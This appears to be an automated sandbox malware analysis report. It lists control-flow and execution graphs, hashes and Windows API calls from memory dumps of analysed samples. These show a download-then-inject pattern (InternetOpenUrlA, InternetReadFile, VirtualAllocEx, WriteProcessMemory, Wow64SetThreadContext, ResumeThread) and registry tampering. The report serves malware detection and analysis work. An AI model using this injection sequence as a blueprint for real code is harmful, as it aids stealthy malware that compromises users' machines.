                                          • Source File: 00000000.00000002.2249837674.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd34580000_41DLTjkmOm.jbxd
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID:
                                          • API String ID: 2038078732-0
                                          • Opcode ID: d0319d24590413838de9e2fc3ffefde1a00e16e1398773c745fcef12eb45d42d
                                          • Instruction ID: 5a38d8a23aa7a13d55a93cbd4dc6eca6f07d088b37bc30ac5b83ded0e84e2cec
                                          • Opcode Fuzzy Hash: d0319d24590413838de9e2fc3ffefde1a00e16e1398773c745fcef12eb45d42d
                                          • Instruction Fuzzy Hash: F3F19230A18A8D8FEBA9DF18C8557E977E1FF59301F40417AD80DD7291DF78A9418B81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 643 7ffd34581f3a-7ffd34581f63 644 7ffd34581f6e-7ffd34582031 643->644 645 7ffd34581f65-7ffd34581f6d 643->645 649 7ffd34582033-7ffd34582052 644->649 650 7ffd345820a6-7ffd345820e5 644->650 645->644 649->650 653 7ffd34582054-7ffd3458205e 649->653 654 7ffd3458215a-7ffd3458223b InternetOpenUrlA 650->654 655 7ffd345820e7-7ffd34582106 650->655 656 7ffd34582060-7ffd34582073 653->656 657 7ffd34582098-7ffd345820a0 653->657 664 7ffd34582243-7ffd345822c0 call 7ffd345822dc 654->664 665 7ffd3458223d 654->665 655->654 662 7ffd34582108-7ffd34582112 655->662 659 7ffd34582077-7ffd3458208a 656->659 660 7ffd34582075 656->660 657->650 659->659 663 7ffd3458208c-7ffd34582094 659->663 660->659 666 7ffd34582114-7ffd34582127 662->666 667 7ffd3458214c-7ffd34582154 662->667 663->657 676 7ffd345822c2 664->676 677 7ffd345822c7-7ffd345822db 664->677 665->664 668 7ffd3458212b-7ffd3458213e 666->668 669 7ffd34582129 666->669 667->654 668->668 671 7ffd34582140-7ffd34582148 668->671 669->668 671->667 676->677
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2249837674.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd34580000_41DLTjkmOm.jbxd
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID:
                                          • API String ID: 2038078732-0
                                          • Opcode ID: 28bd801493964df2365e7dc7e5da7bf7bf673cf31f22db471cf14f8ee6e80de0
                                          • Instruction ID: 3074ee9316df438d79d45c30102e405b2b11d54b5dfe51b250a2e22577203961
                                          • Opcode Fuzzy Hash: 28bd801493964df2365e7dc7e5da7bf7bf673cf31f22db471cf14f8ee6e80de0
                                          • Instruction Fuzzy Hash: 65C1A370A08A8D8FDBA9DF18CC55BE87BE1FB5A301F10416EE84ED7291DB789941CB41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 690 7ffd345883a8-7ffd3458845a 694 7ffd3458845c-7ffd3458847f 690->694 695 7ffd34588482-7ffd34588514 WriteProcessMemory 690->695 694->695 697 7ffd34588516 695->697 698 7ffd3458851c-7ffd3458858a 695->698 697->698
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2249837674.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd34580000_41DLTjkmOm.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: d00ac340c645af00d813152c8185aab08d4129bd3fc6ae16712d92a2fa7fa29c
                                          • Instruction ID: f41a1eb4d94d67dec3a46f412696cae8e4c4722c94fe13c76b493d0608913a9f
                                          • Opcode Fuzzy Hash: d00ac340c645af00d813152c8185aab08d4129bd3fc6ae16712d92a2fa7fa29c
                                          • Instruction Fuzzy Hash: DA51E470A08A1C8FDB94DF58C885BE9BBF1FB69311F1082AAD44DE3251DB74A985CF40

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 701 7ffd345881b5-7ffd345881c1 702 7ffd345881cc-7ffd34588309 VirtualAllocEx 701->702 703 7ffd345881c3-7ffd345881cb 701->703 708 7ffd3458830b 702->708 709 7ffd34588311-7ffd3458837d 702->709 703->702 708->709
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2249837674.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd34580000_41DLTjkmOm.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 6cd1440da6818cb539cf5ddbea9ed269a4afacb73a05f89c1d3175ad4b6dcc71
                                          • Instruction ID: 8e25e5acc951ee92011ca6154749cdf1efc302c282fdb66fd5f8bb2ca5d79f66
                                          • Opcode Fuzzy Hash: 6cd1440da6818cb539cf5ddbea9ed269a4afacb73a05f89c1d3175ad4b6dcc71
                                          • Instruction Fuzzy Hash: 6B512970A08A5C8FDF94EF58C885BE9BBF1FB6A310F1051AAD04DE3251CB75A9858B41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 712 7ffd34587ebe-7ffd34587ecb 713 7ffd34587ecd-7ffd34587ed5 712->713 714 7ffd34587ed6-7ffd34587f92 712->714 713->714 718 7ffd34587fb4-7ffd34588016 Wow64SetThreadContext 714->718 719 7ffd34587f94-7ffd34587fb1 714->719 721 7ffd3458801e-7ffd34588074 718->721 722 7ffd34588018 718->722 719->718 722->721
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2249837674.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd34580000_41DLTjkmOm.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 4d95a0daafe14af10a46138f85f1d313f5312015faa3e3d5305f8b3caf3ec5f2
                                          • Instruction ID: d83e44ba4f7dff4a76e7c04c5aaa7599b044bbf3a0ba4135bf30b320a1e88ab9
                                          • Opcode Fuzzy Hash: 4d95a0daafe14af10a46138f85f1d313f5312015faa3e3d5305f8b3caf3ec5f2
                                          • Instruction Fuzzy Hash: DA516D70D0864D8FEB55DFA8C845BEDBBF1FB56310F1082AAD048E7256CB789485CB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 725 7ffd34588079-7ffd34588085 726 7ffd34588087-7ffd3458808f 725->726 727 7ffd34588090-7ffd34588160 ResumeThread 725->727 726->727 732 7ffd34588168-7ffd345881b2 727->732 733 7ffd34588162 727->733 733->732
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2249837674.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd34580000_41DLTjkmOm.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 898eee83f0f2f7f8f5c41d6c7a09f6f8d9a12a908060eae9813237f1c3225850
                                          • Instruction ID: b521cf9602b9e3d1de212c3154328bcf0be8e208fdaf7144d7dbca84f795a0b2
                                          • Opcode Fuzzy Hash: 898eee83f0f2f7f8f5c41d6c7a09f6f8d9a12a908060eae9813237f1c3225850
                                          • Instruction Fuzzy Hash: 1C416970E08B4D8FDB99DFA8C895AEDBBF0FF56310F10416AD049E7252DA74A885CB41

                                          Execution Graph

                                          Execution Coverage:21.5%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:4.8%
                                          Total number of Nodes:63
                                          Total number of Limit Nodes:3
                                          execution_graph 4032 7ffd345883a8 4033 7ffd345883af WriteProcessMemory 4032->4033 4035 7ffd34588516 4033->4035 4036 7ffd34581601 4037 7ffd3458161f 4036->4037 4040 7ffd34580538 4037->4040 4039 7ffd3458168c 4040->4039 4043 7ffd345819c0 4040->4043 4041 7ffd34581a05 4041->4039 4042 7ffd34581d75 InternetOpenA 4044 7ffd34581e12 4042->4044 4043->4041 4043->4042 4044->4039 4045 7ffd34587ebe 4046 7ffd34587ecd Wow64SetThreadContext 4045->4046 4048 7ffd34588018 4046->4048 4078 7ffd3458053d 4079 7ffd3458054b 4078->4079 4080 7ffd34581a05 4079->4080 4081 7ffd34581d75 InternetOpenA 4079->4081 4082 7ffd34581e12 4081->4082 4092 7ffd3458a55d 4093 7ffd3458a567 4092->4093 4098 7ffd345889a0 4093->4098 4097 7ffd3458ae21 4099 7ffd345889a5 ReadProcessMemory 4098->4099 4101 7ffd34588af1 4099->4101 4102 7ffd3458a578 4101->4102 4104 7ffd3458a57d 4102->4104 4103 7ffd345889a0 ReadProcessMemory 4105 7ffd3458ae12 4103->4105 4104->4103 4106 7ffd3458a578 ReadProcessMemory 4105->4106 4107 7ffd3458ae21 4106->4107 4107->4097 4049 7ffd345881b5 4050 7ffd345881c3 VirtualAllocEx 4049->4050 4052 7ffd3458830b 4050->4052 4053 7ffd34581091 4054 7ffd345810af 4053->4054 4057 7ffd34580600 4054->4057 4056 7ffd3458117c 4059 7ffd34580605 4057->4059 4058 7ffd34581a05 4058->4056 4059->4058 4060 7ffd34581d75 InternetOpenA 4059->4060 4061 7ffd34581e12 4060->4061 4061->4056 4062 7ffd34588079 4063 7ffd34588087 ResumeThread 4062->4063 4065 7ffd34588162 4063->4065 4088 7ffd345886fa 4089 7ffd34588708 ReadProcessMemory 4088->4089 4091 7ffd34588af1 4089->4091 4066 7ffd3458234e 4067 7ffd34582379 InternetReadFile 4066->4067 4069 7ffd345824ed 4067->4069 4108 7ffd3458ad6d 4109 7ffd3458ad7e 4108->4109 4110 7ffd345889a0 ReadProcessMemory 4109->4110 4111 7ffd3458ae12 4110->4111 4112 7ffd3458a578 ReadProcessMemory 4111->4112 4113 7ffd3458ae21 4112->4113 4070 7ffd3458787a 4071 7ffd3458788f CreateProcessA 4070->4071 4073 7ffd34587cd6 4071->4073 4074 7ffd34581f3a 4076 7ffd34581f65 InternetOpenUrlA 4074->4076 4077 7ffd3458223d 4076->4077

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID: xa4$(}a4$0xa4$8}a4$M_^$M_^$M_^3$M_^Z$M_^]$Pxa4$X}a4$h}a4$pxa4
                                          • API String ID: 1726664587-3440235180
                                          • Opcode ID: 59551b356b249b6d04f1e22fbc039b3cca3632dcf803444f365d70fc670aa5ad
                                          • Instruction ID: ec4dba8189f510d0be0bed277a111b2fbaef55a1b86100dfca79009ff499f366
                                          • Opcode Fuzzy Hash: 59551b356b249b6d04f1e22fbc039b3cca3632dcf803444f365d70fc670aa5ad
                                          • Instruction Fuzzy Hash: 5EE10772E0D6884FEB96DF6888A52E97BE1FF16314F5441FBC04CD7193EE28A8458742

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: @ia4$@ia4
                                          • API String ID: 963392458-4027851222
                                          • Opcode ID: 34653e7e17e5c2cb256d6f0721d47e2f7d378e768d5d3ba82d73f804c09cb33a
                                          • Instruction ID: 3759446c0b779cea80cccbd9b5496e481e99a41d84852105117963b072888722
                                          • Opcode Fuzzy Hash: 34653e7e17e5c2cb256d6f0721d47e2f7d378e768d5d3ba82d73f804c09cb33a
                                          • Instruction Fuzzy Hash: 8BF15D70A18A8D8FDBB8DF18CC95BE977E1FB59310F40422AD84ED7291DF7896418B81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 343 7ffd34580538-7ffd34581a03 348 7ffd34581a5a-7ffd34581b20 343->348 349 7ffd34581a05-7ffd34581a07 343->349 364 7ffd34581baf-7ffd34581c00 348->364 365 7ffd34581b26-7ffd34581b5b 348->365 350 7ffd34581a11-7ffd34581a17 349->350 351 7ffd34581a09-7ffd34581a0c call 7ffd34580620 349->351 352 7ffd34581a19-7ffd34581a44 350->352 353 7ffd34581a46-7ffd34581a59 350->353 351->350 352->353 368 7ffd34581c8f-7ffd34581cce 364->368 369 7ffd34581c06-7ffd34581c3b 364->369 365->364 372 7ffd34581b5d-7ffd34581b67 365->372 376 7ffd34581cd4-7ffd34581d09 368->376 377 7ffd34581d5d-7ffd34581e10 InternetOpenA 368->377 369->368 381 7ffd34581c3d-7ffd34581c47 369->381 374 7ffd34581ba1-7ffd34581ba9 372->374 375 7ffd34581b69-7ffd34581b7c 372->375 374->364 379 7ffd34581b80-7ffd34581b93 375->379 380 7ffd34581b7e 375->380 376->377 392 7ffd34581d0b-7ffd34581d15 376->392 387 7ffd34581e12 377->387 388 7ffd34581e18-7ffd34581e8d call 7ffd34581ea9 377->388 379->379 382 7ffd34581b95-7ffd34581b9d 379->382 380->379 385 7ffd34581c81-7ffd34581c89 381->385 386 7ffd34581c49-7ffd34581c5c 381->386 382->374 385->368 390 7ffd34581c60-7ffd34581c73 386->390 391 7ffd34581c5e 386->391 387->388 404 7ffd34581e94-7ffd34581ea8 388->404 405 7ffd34581e8f 388->405 390->390 393 7ffd34581c75-7ffd34581c7d 390->393 391->390 396 7ffd34581d4f-7ffd34581d57 392->396 397 7ffd34581d17-7ffd34581d2a 392->397 393->385 396->377 399 7ffd34581d2e-7ffd34581d41 397->399 400 7ffd34581d2c 397->400 399->399 402 7ffd34581d43-7ffd34581d4b 399->402 400->399 402->396 405->404
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID:
                                          • API String ID: 2038078732-0
                                          • Opcode ID: 4187002d8fb7912a6d44b5fd5c8f29e2d80825a68900ae80b25e18594d3d0f71
                                          • Instruction ID: 1f74ce1b88abb070fc9c10453c9db4c67ed04eead0a5ec22f1def9fd27670376
                                          • Opcode Fuzzy Hash: 4187002d8fb7912a6d44b5fd5c8f29e2d80825a68900ae80b25e18594d3d0f71
                                          • Instruction Fuzzy Hash: 07F19030A18A8D8FEBA9DF28C8557E977E1FF59300F40417AD84ED7291DF78A9418B81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 406 7ffd34581f3a-7ffd34581f63 407 7ffd34581f6e-7ffd34582031 406->407 408 7ffd34581f65-7ffd34581f6d 406->408 412 7ffd34582033-7ffd34582052 407->412 413 7ffd345820a6-7ffd345820e5 407->413 408->407 412->413 418 7ffd34582054-7ffd3458205e 412->418 416 7ffd3458215a-7ffd3458223b InternetOpenUrlA 413->416 417 7ffd345820e7-7ffd34582106 413->417 426 7ffd34582243-7ffd345822c0 call 7ffd345822dc 416->426 427 7ffd3458223d 416->427 417->416 428 7ffd34582108-7ffd34582112 417->428 419 7ffd34582060-7ffd34582073 418->419 420 7ffd34582098-7ffd345820a0 418->420 421 7ffd34582077-7ffd3458208a 419->421 422 7ffd34582075 419->422 420->413 421->421 425 7ffd3458208c-7ffd34582094 421->425 422->421 425->420 439 7ffd345822c2 426->439 440 7ffd345822c7-7ffd345822db 426->440 427->426 429 7ffd34582114-7ffd34582127 428->429 430 7ffd3458214c-7ffd34582154 428->430 432 7ffd3458212b-7ffd3458213e 429->432 433 7ffd34582129 429->433 430->416 432->432 435 7ffd34582140-7ffd34582148 432->435 433->432 435->430 439->440
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID:
                                          • API String ID: 2038078732-0
                                          • Opcode ID: 9a488de135297b3ac23d4fbc2e0b1c702ab5df66464a67e6f35aafc76a597ba7
                                          • Instruction ID: 8e03ec5b358fcb0d6dd6638e84a9fed67c48f7187299f4042bceb657d5483613
                                          • Opcode Fuzzy Hash: 9a488de135297b3ac23d4fbc2e0b1c702ab5df66464a67e6f35aafc76a597ba7
                                          • Instruction Fuzzy Hash: 86C19270A08A8D8FDBA9DF28CC55BE87BE1FB5A300F10416EE84EC7291DB789541CB41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 441 7ffd3458234e-7ffd34582377 442 7ffd34582382-7ffd34582435 441->442 443 7ffd34582379-7ffd34582381 441->443 447 7ffd3458245e-7ffd345824eb InternetReadFile 442->447 448 7ffd34582437-7ffd3458245b 442->448 443->442 449 7ffd345824f3-7ffd34582553 447->449 450 7ffd345824ed 447->450 448->447 450->449
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: FileInternetRead
                                          • String ID:
                                          • API String ID: 778332206-0
                                          • Opcode ID: 8d374280164ffb129b2fddc03801215bc755fd02765ec251b36525c8c808ed2d
                                          • Instruction ID: 29f0c3e0c1fe495be05d3213c669125d310fa8ac2456c393b5a878bf945f6891
                                          • Opcode Fuzzy Hash: 8d374280164ffb129b2fddc03801215bc755fd02765ec251b36525c8c808ed2d
                                          • Instruction Fuzzy Hash: 09714970908A4C8FDB59DF58C895BE9BBF0FB1A311F1041AED049E7292DB74A885CB81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 453 7ffd345883a8-7ffd3458845a 457 7ffd3458845c-7ffd3458847f 453->457 458 7ffd34588482-7ffd34588514 WriteProcessMemory 453->458 457->458 460 7ffd34588516 458->460 461 7ffd3458851c-7ffd3458858a 458->461 460->461
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: d00ac340c645af00d813152c8185aab08d4129bd3fc6ae16712d92a2fa7fa29c
                                          • Instruction ID: f41a1eb4d94d67dec3a46f412696cae8e4c4722c94fe13c76b493d0608913a9f
                                          • Opcode Fuzzy Hash: d00ac340c645af00d813152c8185aab08d4129bd3fc6ae16712d92a2fa7fa29c
                                          • Instruction Fuzzy Hash: DA51E470A08A1C8FDB94DF58C885BE9BBF1FB69311F1082AAD44DE3251DB74A985CF40

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 464 7ffd345881b5-7ffd345881c1 465 7ffd345881cc-7ffd34588309 VirtualAllocEx 464->465 466 7ffd345881c3-7ffd345881cb 464->466 471 7ffd3458830b 465->471 472 7ffd34588311-7ffd3458837d 465->472 466->465 471->472
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 6cd1440da6818cb539cf5ddbea9ed269a4afacb73a05f89c1d3175ad4b6dcc71
                                          • Instruction ID: 8e25e5acc951ee92011ca6154749cdf1efc302c282fdb66fd5f8bb2ca5d79f66
                                          • Opcode Fuzzy Hash: 6cd1440da6818cb539cf5ddbea9ed269a4afacb73a05f89c1d3175ad4b6dcc71
                                          • Instruction Fuzzy Hash: 6B512970A08A5C8FDF94EF58C885BE9BBF1FB6A310F1051AAD04DE3251CB75A9858B41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 475 7ffd345889a0-7ffd34588aef ReadProcessMemory 482 7ffd34588af7-7ffd34588b59 475->482 483 7ffd34588af1 475->483 483->482
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 4f4ecff3397df05f194c3815569d9e94a62a6252b61e50c23dac9f9a0435117d
                                          • Instruction ID: efdcace42715261e415599ed3ac7be9b71f06f0f0f11febb42f33a7a2cf8cc96
                                          • Opcode Fuzzy Hash: 4f4ecff3397df05f194c3815569d9e94a62a6252b61e50c23dac9f9a0435117d
                                          • Instruction Fuzzy Hash: 3C512870D08A5C8FDB94DF58C895BE9BBF1FB69310F1081AAD44CE3252DB74A985CB40

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 486 7ffd34587ebe-7ffd34587ecb 487 7ffd34587ecd-7ffd34587ed5 486->487 488 7ffd34587ed6-7ffd34587f92 486->488 487->488 492 7ffd34587fb4-7ffd34588016 Wow64SetThreadContext 488->492 493 7ffd34587f94-7ffd34587fb1 488->493 495 7ffd3458801e-7ffd34588074 492->495 496 7ffd34588018 492->496 493->492 496->495
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 4d95a0daafe14af10a46138f85f1d313f5312015faa3e3d5305f8b3caf3ec5f2
                                          • Instruction ID: d83e44ba4f7dff4a76e7c04c5aaa7599b044bbf3a0ba4135bf30b320a1e88ab9
                                          • Opcode Fuzzy Hash: 4d95a0daafe14af10a46138f85f1d313f5312015faa3e3d5305f8b3caf3ec5f2
                                          • Instruction Fuzzy Hash: DA516D70D0864D8FEB55DFA8C845BEDBBF1FB56310F1082AAD048E7256CB789485CB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 499 7ffd34588079-7ffd34588085 500 7ffd34588087-7ffd3458808f 499->500 501 7ffd34588090-7ffd34588160 ResumeThread 499->501 500->501 506 7ffd34588168-7ffd345881b2 501->506 507 7ffd34588162 501->507 507->506
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.2257542944.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_7ffd34580000_Lamsses.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 898eee83f0f2f7f8f5c41d6c7a09f6f8d9a12a908060eae9813237f1c3225850
                                          • Instruction ID: b521cf9602b9e3d1de212c3154328bcf0be8e208fdaf7144d7dbca84f795a0b2
                                          • Opcode Fuzzy Hash: 898eee83f0f2f7f8f5c41d6c7a09f6f8d9a12a908060eae9813237f1c3225850
                                          • Instruction Fuzzy Hash: 1C416970E08B4D8FDB99DFA8C895AEDBBF0FF56310F10416AD049E7252DA74A885CB41

                                          Execution Graph

                                          Execution Coverage:1.1%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:4.3%
                                          Total number of Nodes:506
                                          Total number of Limit Nodes:9
                                          execution_graph 46948 434887 46949 434893 ___BuildCatchObject 46948->46949 46974 434596 46949->46974 46951 43489a 46953 4348c3 46951->46953 47269 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46951->47269 46962 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46953->46962 47270 444251 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 46953->47270 46955 4348dc 46957 4348e2 ___BuildCatchObject 46955->46957 47271 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 46955->47271 46958 434962 46985 434b14 46958->46985 46962->46958 47272 4433e7 35 API calls 5 library calls 46962->47272 46969 43498e 46971 434997 46969->46971 47273 4433c2 28 API calls _Atexit 46969->47273 47274 43470d 13 API calls 2 library calls 46971->47274 46975 43459f 46974->46975 47275 434c52 IsProcessorFeaturePresent 46975->47275 46977 4345ab 47276 438f31 10 API calls 4 library calls 46977->47276 46979 4345b0 46980 4345b4 46979->46980 47277 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46979->47277 46980->46951 46982 4345bd 46983 4345cb 46982->46983 47278 438f5a 8 API calls 3 library calls 46982->47278 46983->46951 47279 436e90 46985->47279 46988 434968 46989 4441a2 46988->46989 47281 44f059 46989->47281 46991 4441ab 46992 434971 46991->46992 47285 446815 35 API calls 46991->47285 46994 40e9c5 46992->46994 47287 41cb50 LoadLibraryA GetProcAddress 46994->47287 46996 40e9e1 GetModuleFileNameW 47292 40f3c3 46996->47292 46998 40e9fd 47307 4020f6 46998->47307 47001 4020f6 28 API calls 47002 40ea1b 47001->47002 47313 41be1b 47002->47313 47006 40ea2d 47339 401e8d 47006->47339 47008 40ea36 47009 40ea93 47008->47009 47010 40ea49 47008->47010 47345 401e65 22 API calls 47009->47345 47369 40fbb3 116 API calls 47010->47369 47013 40ea5b 47370 401e65 22 API calls 47013->47370 47014 40eaa3 47346 401e65 22 API calls 47014->47346 47016 40ea67 47371 410f37 36 API calls __EH_prolog 47016->47371 47018 40eac2 47347 40531e 28 API calls 47018->47347 47021 40ead1 47348 406383 28 API calls 47021->47348 47022 40ea79 47372 40fb64 77 API calls 47022->47372 47025 40eadd 47349 401fe2 47025->47349 47026 40ea82 47373 40f3b0 70 API calls 47026->47373 47032 401fd8 11 API calls 47034 40eefb 47032->47034 47033 401fd8 11 API calls 47035 40eafb 47033->47035 47264 4432f6 GetModuleHandleW 47034->47264 47361 401e65 22 API calls 47035->47361 47037 40eb04 47362 401fc0 28 API calls 47037->47362 47039 40eb0f 47363 401e65 22 API calls 47039->47363 47041 40eb28 47364 401e65 22 API calls 47041->47364 47043 40eb43 47044 40ebae 47043->47044 47374 406c1e 28 API calls 47043->47374 47365 401e65 22 API calls 47044->47365 47047 40eb70 47048 401fe2 28 API calls 47047->47048 47049 40eb7c 47048->47049 47052 401fd8 11 API calls 47049->47052 47050 40ec02 47366 40d069 47050->47366 47051 40ebbb 47051->47050 47376 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47051->47376 47053 40eb85 47052->47053 47375 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47053->47375 47055 40ec08 47056 40ea8b 47055->47056 47378 41b2c3 33 API calls 47055->47378 47056->47032 47059 40eba4 47059->47044 47061 40f34f 47059->47061 47461 4139a9 30 API calls 47061->47461 47062 40ec23 47065 40ec76 47062->47065 47379 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47062->47379 47063 40ebe6 47063->47050 47377 4139a9 30 API calls 47063->47377 47384 401e65 22 API calls 47065->47384 47069 40ec7f 47077 40ec90 47069->47077 47078 40ec8b 47069->47078 47070 40ec3e 47072 40ec42 47070->47072 47073 40ec4c 47070->47073 47071 40f365 47462 412475 65 API calls ___scrt_fastfail 47071->47462 47380 407738 30 API calls 47072->47380 47382 401e65 22 API calls 47073->47382 47386 401e65 22 API calls 47077->47386 47385 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47078->47385 47079 40ec47 47381 407260 97 API calls 47079->47381 47084 40f37f 47464 413a23 RegOpenKeyExW RegDeleteValueW 47084->47464 47085 40ec99 47387 41bc5e 28 API calls 47085->47387 47087 40ec55 47087->47065 47090 40ec71 47087->47090 47089 40eca4 47388 401f13 28 API calls 47089->47388 47383 407260 97 API calls 47090->47383 47091 40f392 47465 401f09 11 API calls 47091->47465 47095 40ecaf 47389 401f09 11 API calls 47095->47389 47097 40f39c 47466 401f09 11 API calls 47097->47466 47098 40ecb8 47390 401e65 22 API calls 47098->47390 47101 40f3a5 47467 40dd42 27 API calls 47101->47467 47102 40ecc1 47391 401e65 22 API calls 47102->47391 47104 40f3aa 47468 414f2a 167 API calls 